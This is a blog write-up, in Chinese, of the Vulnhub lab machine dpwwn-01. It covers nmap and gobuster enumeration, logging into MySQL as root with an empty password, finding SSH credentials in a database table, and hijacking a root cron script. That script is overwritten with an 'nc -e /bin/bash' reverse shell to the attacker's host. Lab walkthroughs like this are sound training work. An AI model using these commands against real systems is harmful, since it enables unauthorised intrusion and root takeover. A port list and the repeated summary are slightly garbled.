dpwwn-01靶机笔记-CSDN博客

本文链接：https://blog.csdn.net/weixin_63279914/article/details/141093595

dpwwn-01靶机笔记

概述

这是一台Vulnhub的靶机，主要在web方面，我们无法找到突破口时，应该怎样抉择mysql和ssh的爆破，以及弱口令的尝试。

我这里准备了连接，当然你也可去Vulnhub平台自己下载

dpwwn-01靶机：https://pan.baidu.com/s/1P5Peude95xYcsUsKd0_55w?pwd=8v4h
提取码：8v4h

一、nmap扫描

1、主机发现

# -sn只做ping扫描，不做端口扫描
sudo nmap -sn 192.168.84.1/24

看到靶机IP地址是192.168.84.129

MAC Address: 00:50:56:FA:CB:D3 (VMware)                                                                
Nmap scan report for 192.168.84.129                        
Host is up (0.00072s latency).

2、端口扫描

-sT 以TCP全连接扫描，–min-rate 10000 以最低10000速率进行扫描，-p-进行全端口扫描，-o ports结果输出到ports文件中

sudo nmap -sT --min-rate 10000 -p- 192.168.84.129 -o ports

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:43 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:33:4A:85 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

提取端口

cat 查看文件 grep过滤open字符串 awk 中-F指定分隔符，打印分隔后的第一列，paste -s指定多行拼接，-d指定拼接符

cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','

结果 22,80,139,445,3306,6667

复制给变了ports

ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')

3、详细信息扫描

以-sT 以tcp， -sV探测版本， -sC以默认脚本扫描端口 $ports，-O探测操作系统版本，输出到details文件中

sudo nmap -sT -sV -sC -p$ports -O 192.168.84.129 -o details

# 在输入完$ports按tab键会自动补全端口

sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.84.129 -o details

结果：

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:46 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00026s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c1d3be39429d5cb4952c5b2e20590e3a (RSA)
|   256 434ac610e7177da0c0c376881d43a18c (ECDSA)
|_  256 0ecce3e1f78773a10347b9e2cf1c9315 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.60-MariaDB
|   Thread ID: 6
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolNew, SupportsCompression, ODBCClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, FoundRows, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, SupportsLoadDataLocal, InteractiveClient, DontAllowDatabaseTableColumn, LongPassword, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: pT5IR={v`[(QD?NJgK~Y
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:33:4A:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds

看到目标服务开启了ssh，http，mysql服务的详细信息，服务比较少。

4、默认脚本扫描

nmap --script=vuln -p22,80,3306 192.168.84.129 -o vuln

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:48 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00031s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 147.72 seconds

根据优先级，我们应该是先对web做渗透测试，然后依次是，mysql，ssh等

二、web渗透

我们现访问一下80端口

在这里插入图片描述

这是一个apache服务的默认页面，我们只能尝试目录爆破了。

gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.84.129
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

没有发现目录，我们加上指定后缀在爆破试一试

sudo gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,tar,conf

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.84.129
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,tar,conf
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info.php             (Status: 200) [Size: 47462]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

只有一个info.php

依然没有有用的信息

我们在目录爆破没有收获的时候，现在要怎么抉择，因为我们并没有针对性的用户名和密码字典，ssh和mysql服务都需要爆破。这时我们应该先选择爆破mysql，因为我们虽然知道爆破ssh，一旦爆破进去就会获得立足点，但是我们并不知道可能存在的用户名和密码，这将耗费我们大部分的时间去做没有收获的事情。而mysql服务有默认的root用户，我们只需要用小部分时间尝试一下弱口令，以及爆破。

综上，我们应该优先去尝试以mysql作为突破口

3、获得立足点

尝试mysql的root弱口令

mysql -uroot -h 192.168.84.129

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1535
Server version: 5.5.60-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

可以看到，我们直接空密码就进来了

翻找用户信息 show databases;

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.010 sec)

看到ssh数据库，查看一下

有users ，查看一下

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.000 sec)

看到了一组凭据。我们保存下来

echo "mistic:testP@\$\$swordmistic" > creds

ssh连接

sudo ssh mistic@192.168.84.129

成功获得立足点

四、提权到root

在mistic用户目录下看到logrot.sh脚本

查看一下脚本

[mistic@dpwwn-01 ~]$ cat logrot.sh 
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "$line" >> $LOGFILE
done

既然有这个脚本，我们先想到查看一下定时任务，是不是在运行这个脚本。

[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/3 *  * * *  root  /home/mistic/logrot.sh

的确有这个定时任务，可以直接修改logrot.sh脚本来进行提权

echo "nc -e /bin/bash 192.168.84.128 4444" > logrot.sh

本地监听4444端口

nc -lvp 4444

提权成功

拿flag

我知道这是一个很简单的挑战，祝贺

总结

我们通过nmap扫描发现目标开启了ssh，http,mysql服务。
先对web站点进行了目录爆破，可惜一无所获。
然后就陷入了实现爆破ssh，还是mysql的窘境，因为我们并没有有力的信息，去构造有价值与针对性的字典。
因为mysql有默认的用户名root，我们选择对它尝试弱口令，成功登陆mysql，发现ssh凭据。
利用ssh凭据，成功获得立足点，在mistic用户目录下发现logrot.sh定时任务脚本。

[外链图片转存中…(img-9WYEBIYP-1723281683945)]

提权成功

拿flag

[外链图片转存中…(img-8Rf4EDpn-1723281683946)]

我知道这是一个很简单的挑战，祝贺

总结

我们通过nmap扫描发现目标开启了ssh，http,mysql服务。
先对web站点进行了目录爆破，可惜一无所获。
然后就陷入了实现爆破ssh，还是mysql的窘境，因为我们并没有有力的信息，去构造有价值与针对性的字典。
因为mysql有默认的用户名root，我们选择对它尝试弱口令，成功登陆mysql，发现ssh凭据。
利用ssh凭据，成功获得立足点，在mistic用户目录下发现logrot.sh定时任务脚本。
利用定时人物脚本，反弹root权限的shell。成功拿下这台机器。